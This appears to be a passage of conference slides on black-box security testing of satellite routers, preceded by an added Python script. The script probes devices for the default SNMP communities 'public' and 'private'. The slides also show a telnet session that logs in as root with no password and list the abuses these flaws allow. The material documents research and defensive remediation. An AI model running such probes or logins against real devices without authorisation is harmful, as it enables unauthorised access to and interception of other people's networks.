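Checking for a default community is a one-packet test: an SNMPv1 GetRequest for sysDescr.0 sent with "public" (or "private") either comes back as a GetResponse with error-status 0 or gets no answer. The Python below, an added example and not part of the original report, encodes that request in raw BER and decodes the reply, so the bytes can be inspected and tested offline; probe_communities() is the only part that touches the network. It assumes the agent speaks SNMPv1 on UDP/161 (the talk only says the devices had SNMP), and the sysDescr value used in the offline test is constructed. On the SIT whose community "cannot be modified" the only fix is to filter UDP/161 from untrusted networks; where the community can be changed, set a non-default one or move to SNMPv3.

```python
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"          # sysDescr.0, answered by practically every agent
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2


def ber_tlv(tag: int, content: bytes) -> bytes:
    """Tag-Length-Value with definite-length encoding (short or long form)."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    length = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length)]) + length + content


def ber_int(value: int) -> bytes:
    """Non-negative INTEGER; a leading zero byte keeps the sign bit clear."""
    return ber_tlv(0x02, value.to_bytes(max(1, (value.bit_length() + 8) // 8), "big"))


def encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    body = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:                  # base-128, high bit set on all but the last byte
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body.extend(reversed(chunk))
    return ber_tlv(0x06, bytes(body))


def snmp_v1_get(community: str, oid: str = SYS_DESCR, request_id: int = 1) -> bytes:
    """SNMPv1 GetRequest: Message{version=0, community, PDU{id, 0, 0, [oid = NULL]}}."""
    varbind = ber_tlv(0x30, encode_oid(oid) + b"\x05\x00")
    pdu = ber_tlv(GET_REQUEST, ber_int(request_id) + ber_int(0) + ber_int(0) + ber_tlv(0x30, varbind))
    return ber_tlv(0x30, ber_int(0) + ber_tlv(0x04, community.encode()) + pdu)


def build_v1_response(community: str, value: bytes, oid: str = SYS_DESCR, request_id: int = 1) -> bytes:
    """GetResponse as an agent would send it; used here only to exercise the parser offline."""
    varbind = ber_tlv(0x30, encode_oid(oid) + ber_tlv(0x04, value))
    pdu = ber_tlv(GET_RESPONSE, ber_int(request_id) + ber_int(0) + ber_int(0) + ber_tlv(0x30, varbind))
    return ber_tlv(0x30, ber_int(0) + ber_tlv(0x04, community.encode()) + pdu)


def read_tlv(buf: bytes, pos: int):
    """Return (tag, content, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + nbytes], "big"), pos + nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_v1_response(packet: bytes) -> dict:
    """Community, request id, error-status and first varbind value of a GetResponse."""
    _, msg, _ = read_tlv(packet, 0)
    _, _version, pos = read_tlv(msg, 0)
    _, community, pos = read_tlv(msg, pos)
    pdu_tag, pdu, _ = read_tlv(msg, pos)
    if pdu_tag != GET_RESPONSE:
        raise ValueError("not a GetResponse PDU: 0x%02x" % pdu_tag)
    _, req_id, pos = read_tlv(pdu, 0)
    _, status, pos = read_tlv(pdu, pos)
    _, _index, pos = read_tlv(pdu, pos)
    _, varbinds, _ = read_tlv(pdu, pos)
    _, varbind, _ = read_tlv(varbinds, 0)
    _, _oid, pos = read_tlv(varbind, 0)
    value_tag, value, _ = read_tlv(varbind, pos)
    return {
        "community": community.decode(errors="replace"),
        "request_id": int.from_bytes(req_id, "big"),
        "error_status": int.from_bytes(status, "big"),
        "value": value if value_tag == 0x04 else None,   # OCTET STRING only; else None
    }


def probe_communities(host: str, communities=("public", "private"),
                      port: int = 161, timeout: float = 2.0) -> dict:
    """Try each community; map those answered with error-status 0 to the sysDescr returned."""
    accepted = {}
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        for community in communities:
            sock.sendto(snmp_v1_get(community), (host, port))
            try:
                data, _ = sock.recvfrom(4096)
            except socket.timeout:
                continue                  # no answer: community rejected, or UDP/161 filtered
            reply = parse_v1_response(data)
            if reply["error_status"] == 0 and reply["community"] == community:
                accepted[community] = reply["value"]
    return accepted
```

SNMPv1 agents never say "wrong community"; they simply do not reply, so a timeout is the negative result and a missing reply cannot be told apart from a firewall without a second vantage point.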
ZOOM: SAT ROUTER’S B.B. SECURITY TESTING
What we found:
5) TELNET access with NULL password (!)
In another black-box test, we found a device with TELNET open and without a management password... this is really sad.
ZOOM: SAT ROUTER’S B.B. SECURITY TESTING
root@Slap[]: telnet 10.200.8.1
Trying 10.200.8.1...
Connected to 10.200.8.1.
Escape character is '^]'.
Password:
Logged in as root
help
?  help  version  alias  unalias  delay  script  doscript  setprompt  repeat  systat
mcbstat  mcbprt  memstat  syscnt  pbconf  sysconf  niprt  util  plog  ptime  echo
msgtrace  nochkdest  chkdest  putuseconput  conolog  time  date  sendtime  uptime
bc  bread  read  lread  bwrite  write  lwrite  bcopy  bcmp  memtest  hwreset
reboot  setprad  restart  kill  setqsize  poll  initp  resetp  devstart  devstop
attach  unattach  prtstat  show  clrstat  config  prtconfig  enable  disable
setloop  clrloop  settrace  prtcache  reseticache  passwd  rloginauth  whoami
login  logout  rlogout  exit  nvram_fstat  nvram_parms  nvram_init  nvram_open
nvram_read  nvram_create  nvram_write  nvram_close  nvram_copy  nvram_lseek
mdbselect  mdbfiletype  mdbread  mdbwrite  mdbdatavalid  dblist  dbprint
dbprintdef  dbsetvalue  dbsetfield  dbadd  dbdelete  dbdeleteall  ksetprint
ethnrtsho  ethprtsho  ethnrtadd  ethprtadd  ethsetprom  ethclrprom  ethtest
ethenabcast  ethdisbcast  ethsetloop  ethclrloop  setipaddr  proxytcpstatus
arpadd  arpdelete  arpproxyadd  arpproxydel  arpproxylist  ping  riproutes
disproutecb  addsroute  showtree  showextnodes  stressroute  rtprt  nhtprt
hrtprt  rtlook  hrtlook  mrtprt  addmroute  delmroute  savebootparms  switchbb
bbrcvrinfo  setdbready  kdbpr
R&D RESULTS: WHAT HAS BEEN LEARNT
(Extract from the main Italian reports)
The tests performed revealed serious security problems in the satellite devices, at both the design and the implementation level. Further vulnerabilities are also conceivable, detectable through more specific and in-depth analysis.
The set of vulnerabilities found can lead to the following types of abuse and fraud:
- Use of the target device as a bridge system for attacks against third parties, with the consequent legal liability (civil and criminal);
- Use of the target device as a "Zombie Scan" against third parties, with the consequent legal liability (civil and criminal);
- Abuse and economic fraud in the case of a metered (per-traffic) Internet connection;
- Interception of all IP traffic to and from the satellite link;
- Redirection of IP traffic to and from the satellite link;
- DoS, denial of service;
- Isolation of the satellite Internet connection;
- Reconfiguration of services;
- Installation of data interception tools on the LAN segments where the device is attached.
R&D RESULTS: SOME TIPS
(Extract from the main Italian reports)
We believe it is possible, and we recommend to the manufacturers, that independent third-party companies draw up technical White Papers, Security and Hardening Policies, and Configuration & Installation Security Guidelines for the devices analysed, in order to prevent vulnerabilities and security exposures with a particularly high impact on end users.
We conclude by underlining the need for security testing also from the satellite (IP) connection side, in order to verify the possibility of abuse by remote attackers coming from the public Internet.
QUESTIONS & ANSWERS
CONTACTS
UNCONVENTIONAL TECHNOLOGIES FOR
THE CORPORATE SECURITY & IMAGE
Raoul Chiesa, Chief Technical Officer @ Mediaservice.net (OPST, OPSA)
Mail Contacts
[email protected] (General Enquiries)
[email protected] (Security Enquiries)
[email protected] (Personal Enquiries)
Web Contacts
http://www.mediaservice.net/
http://osstmm.mediaservice.net/
http://www.TSTF.net/
http://www.isecom.org/